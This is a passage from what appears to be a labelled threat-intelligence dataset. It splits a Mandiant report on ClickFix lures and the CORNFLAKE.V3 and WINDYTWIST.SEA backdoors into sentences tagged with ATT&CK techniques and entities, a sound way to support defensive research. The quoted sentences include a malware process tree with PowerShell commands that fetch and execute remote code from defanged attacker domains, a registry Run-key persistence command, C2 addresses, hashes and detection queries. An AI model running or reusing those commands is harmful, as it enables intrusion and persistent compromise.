"Action" }, { "text": "written to disk", "start": 358, "end": 373, "label": "Action" }, { "text": "C:\\Users\\\\AppData\\Roaming\\Shift194340\\78G0ZrQi.png", "start": 377, "end": 433, "label": "Infrastructure_Indicator" }, { "text": "executed using rundll32", "start": 438, "end": 461, "label": "Action" }, { "text": "rundll32", "start": 453, "end": 461, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s137-1a5b95", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "All local groups and their members Current User name, SID, local group memberships and security privileges Not Domain Joined All local groups and their members Current User name, SID, local group memberships and security privileges WINDYTWIST.SEA Backdoor Following the interaction with its C2 server, a DLL payload (corresponding to command ) was received, written to disk as C:\\Users\\\\AppData\\Roaming\\Shift194340\\78G0ZrQi.png and executed using rundll32 .", "sentence_text": "This file was a WINDYTWIST.SEA backdoor implant configured with the following C2 servers:\ntcp://167.235.235[.]151:443\ntcp://128.140.120[.]188:443\ntcp://177.136.225[.]135:443\nThis implant is a C version of the Java WINDYTWIST backdoor, which supports relaying TCP traffic, providing a reverse shell, executing commands, and deleting itself.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s138-353029", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "This file was a WINDYTWIST.SEA backdoor implant...", "sentence_text": "In previous intrusions, Mandiant observed WINDYTWIST.SEA samples attempting to move laterally in the network of the infected machine.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Move laterally across network using backdoor.", "entities": [ { "text": "WINDYTWIST.SEA", "start": 42, "end": 56, "label": "MalwareTool" }, { "text": "attempting to move laterally", "start": 65, "end": 93, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s139-175cba", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "In previous intrusions, Mandiant observed WINDYTWIST.SEA samples attempting to move laterally in the network of the infected machine.", "sentence_text": "The following process tree was observed during the infection:\nexplorer.exe\n↳ C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\"-c irm dnsmicrosoftds-data[.]com/log/out | clip; & ([scriptblock]::Create((Get-Clipboard) -join (\"\"+[System.Environment]::NewLine)))\" ↳ C:\\WINDOWS\\system32\\clip.exe ↳ C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \"-w H -c irm windows-msg-as[.]live/qwV1jxQ\" ↳ C:\\WINDOWS\\system32\\systeminfo.exe ↳ C:\\Users\\\\AppData\\Roaming\\php\\php.exe \"-d extension=zip -d extension_dir=ext C:\\Users\\\\AppData\\Roaming\\php\\config.cfg 1 {CORNFLAKE.V3}\" ↳ cmd.exe /s /c \"powershell -c {Multiple PS Commands for Host Reconnaissance}\" ↳ cmd.exe /s /c \"powershell -c {Multiple PS Commands for Host Reconnaissance}\" ↳ cmd.exe /s /c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s140-ce5f81", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "The following process tree was observed during the infection:\nexplorer.exe\n↳ C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\"-c irm dnsmicrosoftds-data[.]com/log/out | clip; & ([scriptblock]::Create((Get-Clipboard) -join (\"\"+[System.Environment]::NewLine)))\" ↳ C:\\WINDOWS\\system32\\clip.exe ↳ C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \"-w H -c irm windows-msg-as[.]live/qwV1jxQ\" ↳ C:\\WINDOWS\\system32\\systeminfo.exe ↳ C:\\Users\\\\AppData\\Roaming\\php\\php.exe \"-d extension=zip -d extension_dir=ext C:\\Users\\\\AppData\\Roaming\\php\\config.cfg 1 {CORNFLAKE.V3}\" ↳ cmd.exe /s /c \"powershell -c {Multiple PS Commands for Host Reconnaissance}\" ↳ cmd.exe /s /c \"powershell -c {Multiple PS Commands for Host Reconnaissance}\" ↳ cmd.exe /s /c", "sentence_text": "\"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"random_appdata_dirname\" /t", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s142-254632", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "REG_SZ /d", "sentence_text": "\"\\\"\" \\\"\"\" /f\" ↳ powershell.exe ↳ C:\\Windows\\System32\\rundll32.exe \"{WINDYTWIST.SEA Backdoor}\" start Conclusion This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Leveraged compromised websites and deceptive ClickFix lures to gain initial access and launch WINDYTWIST.SEA backdoor via PowerShell and rundll32", "entities": [ { "text": "UNC5518", "start": 227, "end": 234, "label": "ThreatActor" }, { "text": "WINDYTWIST.SEA Backdoor", "start": 98, "end": 121, "label": "MalwareTool" }, { "text": "compromised websites and deceptive ClickFix lures", "start": 245, "end": 294, "label": "Infrastructure_Indicator" }, { "text": "leverages compromised websites and deceptive ClickFix lures ", "start": 235, "end": 295, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s143-eaa59a", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "\"\\\"\" \\\"\"\" /f\" ↳ powershell.exe ↳ C:\\Windows\\System32\\rundll32.exe \"{WINDYTWIST.SEA Backdoor}\" start Conclusion This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access.", "sentence_text": "This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Use access obtained through UNC5518 activity to deploy CORNFLAKE.V3 backdoor.", "entities": [ { "text": "UNC5774", "start": 50, "end": 57, "label": "ThreatActor" }, { "text": "deploy versatile malware", "start": 63, "end": 87, "label": "Action" }, { "text": "CORNFLAKE.V3 backdoor", "start": 100, "end": 121, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s144-8dafdc", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor.", "sentence_text": "The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s145-c29be4", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 145, "context_before": "The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.", "sentence_text": "To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s146-25c57f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 146, "context_before": "To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible.", "sentence_text": "Regular simulation exercises are crucial to counter this and other social engineering tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s147-27dc95", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 147, "context_before": "Regular simulation exercises are crucial to counter this and other social engineering tactics.", "sentence_text": "The following UDM queries can be used to identify potential compromises within your environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s148-7a5455", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 148, "context_before": "The following UDM queries can be used to identify potential compromises within your environment.", "sentence_text": "Execution of CORNFLAKE.V3 — Node.js Search for potential compromise activity where PowerShell is used to launch node.exe from %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s149-2cbe49", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 149, "context_before": "Execution of CORNFLAKE.V3 — Node.js Search for potential compromise activity where PowerShell is used to launch node.exe from %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.", "sentence_text": "metadata.event_type = \"PROCESS_LAUNCH\" principal.process.file.full_path = /powershell\\.exe/ nocase", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s150-c4717c", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 150, "context_before": "metadata.event_type = \"PROCESS_LAUNCH\" principal.process.file.full_path = /powershell\\.exe/ nocase", "sentence_text": "target.process.file.full_path = /appdata\\\\roaming\\\\.*node\\.exe/ nocase target.process.command_line", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s151-145805", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 151, "context_before": "target.process.file.full_path = /appdata\\\\roaming\\\\.*node\\.exe/ nocase target.process.command_line", "sentence_text": "= /\"?node\\.exe\"?\\s*-e\\s*\"/ nocase", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s152-5af5d2", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 152, "context_before": "= /\"?node\\.exe\"?\\s*-e\\s*\"/ nocase", "sentence_text": "Execution of CORNFLAKE.V3 — PHP Search for compromise activity where PowerShell is executing php.exe from %AppData% path.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Execute php.exe via PowerShell from AppData path.", "entities": [ { "text": "CORNFLAKE.V3", "start": 13, "end": 25, "label": "MalwareTool" }, { "text": "PowerShell is executing php.exe from %AppData% path", "start": 69, "end": 120, "label": "Action" }, { "text": "%AppData%", "start": 106, "end": 115, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s153-95be39", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 153, "context_before": "Execution of CORNFLAKE.V3 — PHP Search for compromise activity where PowerShell is executing php.exe from %AppData% path.", "sentence_text": "metadata.event_type = \"PROCESS_LAUNCH\" principal.process.file.full_path = /powershell\\.exe/ nocase target.process.file.full_path = /appdata\\\\roaming\\\\.*php\\.exe/ nocase target.process.command_line", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s154-5d8225", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 154, "context_before": "metadata.event_type = \"PROCESS_LAUNCH\" principal.process.file.full_path = /powershell\\.exe/ nocase target.process.file.full_path = /appdata\\\\roaming\\\\.*php\\.exe/ nocase target.process.command_line", "sentence_text": "= /\"?php\\.exe\"?\\s*-d\\s.*1$/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s155-49de68", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 155, "context_before": "= /\"?php\\.exe\"?\\s*-d\\s.*1$/", "sentence_text": "nocase target.process.command_line !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s157-09ba35", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 157, "context_before": "= /\\.php\\s*\\s*/", "sentence_text": "nocase CORNFLAKE.V3 Child Process Spawns Search suspicious process activity where cmd.exe or powershell.exe are spawned as child processes from node.exe or php.exe when those executables are located in %AppData%.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s158-f6429f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 158, "context_before": "nocase CORNFLAKE.V3 Child Process Spawns Search suspicious process activity where cmd.exe or powershell.exe are spawned as child processes from node.exe or php.exe when those executables are located in %AppData%.", "sentence_text": "metadata.event_type = \"PROCESS_LAUNCH\" principal.process.file.full_path = /appdata\\\\roaming\\\\.*node\\.exe|appdata\\\\roaming\\\\.*php\\.exe/ nocase target.process.file.full_path = /powershell\\.exe|cmd\\.exe/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s159-d49eda", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 159, "context_before": "metadata.event_type = \"PROCESS_LAUNCH\" principal.process.file.full_path = /appdata\\\\roaming\\\\.*node\\.exe|appdata\\\\roaming\\\\.*php\\.exe/ nocase target.process.file.full_path = /powershell\\.exe|cmd\\.exe/", "sentence_text": "nocase Suspicious Connections to Node.js/PHP Domains Search unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s160-ed2eb3", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 160, "context_before": "nocase Suspicious Connections to Node.js/PHP Domains Search unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.", "sentence_text": "metadata.event_type = \"NETWORK_CONNECTION\" principal.process.file.full_path = /powershell\\.exe|mshta\\.exe/ nocase target.hostname = /nodejs\\.org|windows\\.php\\.net/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s161-1b9eac", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 161, "context_before": "metadata.event_type = \"NETWORK_CONNECTION\" principal.process.file.full_path = /powershell\\.exe|mshta\\.exe/ nocase target.hostname = /nodejs\\.org|windows\\.php\\.net/", "sentence_text": "nocase Indicators of Compromise (IOCs)\nGoogle Threat Intelligence (GTI) collection of IOCs is available to registered users Host-Based Artifacts Network-Based Artifacts Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s162-05dea7", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 162, "context_before": "nocase Indicators of Compromise (IOCs)\nGoogle Threat Intelligence (GTI) collection of IOCs is available to registered users Host-Based Artifacts Network-Based Artifacts Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom:", "sentence_text": "A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s163-df259d", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 163, "context_before": "A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\nC2 Communication | TCP socket (XOR encoded) | HTTP (XOR encoded) | HTTP (XOR encoded)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s165-ca997a", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 165, "context_before": "Persistence |", "sentence_text": "| The received payload is written to %", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s166-e2adff", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 166, "context_before": "| The received payload is written to %", "sentence_text": "APPDATA%\\\\.exe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s167-a661f8", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 167, "context_before": "APPDATA%\\\\.exe", "sentence_text": "and launched using the Node.js child_process.spawn() function .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Launch payload using Node.js spawn function.", "entities": [ { "text": "launched using the Node.js child_process.spawn() function", "start": 4, "end": 61, "label": "Action" }, { "text": "Node.js", "start": 23, "end": 30, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s168-1c8dcc", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 168, "context_before": "and launched using the Node.js child_process.spawn() function .", "sentence_text": "1 | DLL | The received payload is written to %APPDATA%\\\\.dll and launched using the Node.js child_process.spawn() function as an argument to rundll32.exe .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218.011", "name": "Rundll32" } ], "procedure": "Writes a malicious DLL to the AppData directory and executes it via rundll32.exe using Node.js child_process.spawn", "entities": [ { "text": "DLL | The received payload", "start": 4, "end": 30, "label": "MalwareTool" }, { "text": "%APPDATA%\\\\.dll ", "start": 45, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "is written to", "start": 31, "end": 44, "label": "Action" }, { "text": "and launched ", "start": 93, "end": 106, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s169-bda045", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 169, "context_before": "1 | DLL | The received payload is written to %APPDATA%\\\\.dll and launched using the Node.js child_process.spawn() function as an argument to rundll32.exe .", "sentence_text": "2 | JS | The received payload is launched from memory as an argument to node.exe using the Node.js child_process.spawn() function .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Executes a malicious payload directly from memory by spawning node.exe via Node.js child_process.spawn", "entities": [ { "text": " node.exe", "start": 71, "end": 80, "label": "MalwareTool" }, { "text": "is launched from memory as an argument to node.exe using the Node.js child_process.spawn() function", "start": 30, "end": 129, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s170-b03d4b", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 170, "context_before": "2 | JS | The received payload is launched from memory as an argument to node.exe using the Node.js child_process.spawn() function .", "sentence_text": "3 | CMD | The received payload is launched from memory as an argument to cmd.exe using the Node.js child_process.spawn() function .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Executes a malicious payload directly from memory by spawning cmd.exe through Node.js child_process.spawn", "entities": [ { "text": "cmd.exe", "start": 73, "end": 80, "label": "MalwareTool" }, { "text": "is launched from memory as an argument to cmd.exe ", "start": 31, "end": 81, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s171-b76b71", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 171, "context_before": "3 | CMD | The received payload is launched from memory as an argument to cmd.exe using the Node.js child_process.spawn() function .", "sentence_text": "Additionally, the output is saved in the LastCmd variable and sent to the C2 in the next request.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s172-48e79e", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 172, "context_before": "Additionally, the output is saved in the LastCmd variable and sent to the C2 in the next request.", "sentence_text": "| EXE | This decrypted content is saved to a temporary executable file ( .exe ) created in a random directory within the user's %APPDATA% folder, and executed through PowerShell as a hidden process.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Save payload to AppData and execute via PowerShell.", "entities": [ { "text": "saved to a temporary executable file", "start": 34, "end": 70, "label": "Action" }, { "text": "executed through PowerShell as a hidden process", "start": 163, "end": 210, "label": "Action" }, { "text": "%APPDATA%", "start": 141, "end": 150, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s173-85a048", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 173, "context_before": "| EXE | This decrypted content is saved...", "sentence_text": "Subsequently, rundll32.exe is invoked to execute the downloaded file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218.011", "name": "Rundll32" } ], "procedure": "Invoke rundll32.exe to execute payload.", "entities": [ { "text": "rundll32.exe", "start": 14, "end": 26, "label": "MalwareTool" }, { "text": "invoked to execute the downloaded file", "start": 30, "end": 68, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s174-0f4379", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 174, "context_before": "Subsequently, rundll32.exe is invoked to execute the downloaded file.", "sentence_text": "The script attempts to check if Node.js is installed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s175-12f923", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 175, "context_before": "The script attempts to check if Node.js is installed.", "sentence_text": "If Node.js is not found or fails to install from a hardcoded URL ( http://nodejs[.]org/dist/v21.7.3/node-v21.7.3-win-x64.zip ), an error message is printed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s176-2403e5", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 176, "context_before": "If Node.js is not found or fails to install...", "sentence_text": "If Node.js is available, the downloaded JavaScript ( .jpg ) file is executed using node.exe .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Execute JavaScript payload using node.exe.", "entities": [ { "text": "Node.js", "start": 3, "end": 10, "label": "MalwareTool" }, { "text": "executed using node.exe", "start": 68, "end": 91, "label": "Action" }, { "text": "JavaScript ( .jpg ) file", "start": 40, "end": 64, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s177-c61d17", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 177, "context_before": "If Node.js is available...", "sentence_text": "3 | CMD | This decrypted data is executed as a provided command string via cmd.exe or powershell.exe .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute decrypted command via cmd or PowerShell.", "entities": [ { "text": "executed as a provided command string", "start": 33, "end": 70, "label": "Action" }, { "text": "cmd.exe", "start": 75, "end": 82, "label": "MalwareTool" }, { "text": "powershell.exe", "start": 86, "end": 100, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s178-921161", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 178, "context_before": "3 | CMD | This decrypted data is executed as a provided command string via cmd.exe or powershell.exe .", "sentence_text": "4 | ACTIVE | This command reports the active_cnt (stored in the $qRunq global variable) to the C2 server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s179-18e220", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 179, "context_before": "4 | ACTIVE | This command reports the active_cnt (stored in the $qRunq global variable) to the C2 server.", "sentence_text": "This likely serves as a heartbeat or activity metric for the implant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s181-7595ad", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 181, "context_before": "5 | AUTORUN", "sentence_text": "| The malware attempts to establish persistence by adding a registry entry in HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run that points to the script's PHP binary and its own path.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ], "procedure": "Add a registry Run key entry pointing to the script's PHP binary and its path to establish persistence.", "entities": [ { "text": "malware", "start": 6, "end": 13, "label": "MalwareTool" }, { "text": "adding a registry entry", "start": 51, "end": 74, "label": "Action" }, { "text": "HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run", "start": 78, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "script's PHP binary", "start": 153, "end": 172, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s182-f7fff4", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 182, "context_before": "| The malware attempts to establish persistence by adding a registry entry in HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run that points to the script's PHP binary and its own path.", "sentence_text": "C:\\Users\\\\AppData\\Roaming\\node-v22.11.0-win-x64\\ckw8ua56.log | Copy of the CORNFLAKE.V3 (Node.js) sample used for persistence | 000b24076cae8dbb00b46bb59188a0da5a940e325eaac7d86854006ec071ac5b HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ChromeUpdater | Registry run key that executes the CORNFLAKE.V3 (Node.js) sample", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s183-d5ae79", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 183, "context_before": "C:\\Users\\\\AppData\\Roaming\\node-v22.11.0-win-x64\\ckw8ua56.log | Copy of the CORNFLAKE.V3 (Node.js) sample used for persistence | 000b24076cae8dbb00b46bb59188a0da5a940e325eaac7d86854006ec071ac5b HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ChromeUpdater | Registry run key that executes the CORNFLAKE.V3 (Node.js) sample", "sentence_text": "| N/A C:\\Users\\\\AppData\\Roaming\\php\\config.cfg | CORNFLAKE.V3 (PHP) sample | a2d4e8c3094c959e144f46b16b40ed29cc4636b88616615b69979f0a44f9a2d1 C:\\Users\\\\AppData\\Roaming\\Shift194340\\78G0ZrQi.png | WINDYTWIST.SEA backdoor sample dropped by CORNFLAKE.V3 (PHP) | 14f9fbbf7e82888bdc9c314872bf0509835a464d1f03cd8e1a629d0c4d268b0c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s184-b99afd", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 184, "context_before": "| N/A C:\\Users\\\\AppData\\Roaming\\php\\config.cfg | CORNFLAKE.V3 (PHP) sample | a2d4e8c3094c959e144f46b16b40ed29cc4636b88616615b69979f0a44f9a2d1 C:\\Users\\\\AppData\\Roaming\\Shift194340\\78G0ZrQi.png | WINDYTWIST.SEA backdoor sample dropped by CORNFLAKE.V3 (PHP) | 14f9fbbf7e82888bdc9c314872bf0509835a464d1f03cd8e1a629d0c4d268b0c", "sentence_text": "138.199.161[.]141 | IP address associated with UNC5518 used to distribute CORNFLAKE.V3 (Node.js) malware", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s185-41d86f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 185, "context_before": "138.199.161[.]141 | IP address associated with UNC5518 used to distribute CORNFLAKE.V3 (Node.js) malware", "sentence_text": "159.69.3[.]151 | CORNFLAKE.V3 (Node.js) C2 server associated with UNC5774 varying-rentals-calgary-predict.trycloudflare[.]com | CORNFLAKE.V3 (PHP) C2 server associated with UNC5774 167.235.235[.]151 128.140.120[.]188 177.136.225[.]135 | WINDYTWIST.SEA backdoor C2 server addresses associated with UNC5774", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s186-1e6383", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 186, "context_before": "159.69.3[.]151 | CORNFLAKE.V3 (Node.js) C2 server associated with UNC5774 varying-rentals-calgary-predict.trycloudflare[.]com | CORNFLAKE.V3 (PHP) C2 server associated with UNC5774 167.235.235[.]151 128.140.120[.]188 177.136.225[.]135 | WINDYTWIST.SEA backdoor C2 server addresses associated with UNC5774", "sentence_text": "[FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, 